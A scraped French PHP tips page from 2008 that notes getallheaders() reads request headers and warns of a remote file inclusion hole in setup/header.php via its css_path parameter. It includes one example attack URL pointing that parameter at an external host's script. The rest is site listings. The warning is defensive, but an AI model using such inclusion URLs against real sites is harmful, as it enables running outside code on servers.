21 Mai 2008
Lire les HTTP Header
Compatibilité : PHP 5, PHP 7, PHP 8
Lire n'importe quel Header de requête se fait en PHP en utilisant la fonction getallheaders ().
Si vous utilisez un script setup/header.php ayant un paramètre css_path, vous pouvez être victimes d'une faille de sécurité. Grâce à ce script il est peut-être possible d'exécuter un script externe avec une url du style http://www.example.com/setup/header.php?css_path=http://www.sitepourri.com/url.txt?
Il faut donc tester que le paramètre ne contient pas une url externe. Dans ce cas là, l'url est bloquée en utilisant le flag F(forbidden) qui revient à renvoyer un code HTTP 403.
21 Mai 2008
Dernière mise à jour :
|
Lire n'importe quel Header de requête se fait en PHP en utilisant la fonction getallheaders ().
Les META REFRESH sont à bannir en HTML car trop souvent utilisés par de nombreux webmasters. Utiliser la fonction header()
Vous en avez marre de voir vos formulaires rempli de Javascript - Ce code va empêcher plusieurs formes de hack JS.
| Langue | |
| Date | hier |
| Taille | 1 Mo |
| Catégorie | CMS |
| Langue | |
| Date | hier |
| Taille | 0.41 Mo |
| Catégorie | Codes |
| Langue | |
| Date | hier |
| Taille | 0.11 Mo |
| Catégorie | Codes |
| Langue | |
| Date | 17 Mars 2026 |
| Taille | 19 Mo |
| Catégorie | Ecommerce |
| Langue | |
| Date | 16 Mars 2026 |
| Taille | 19 Mo |
| Catégorie | Divers |
| Langue | |
| Date | 16 Mars 2026 |
| Taille | 99 Mo |
| Catégorie | Divers |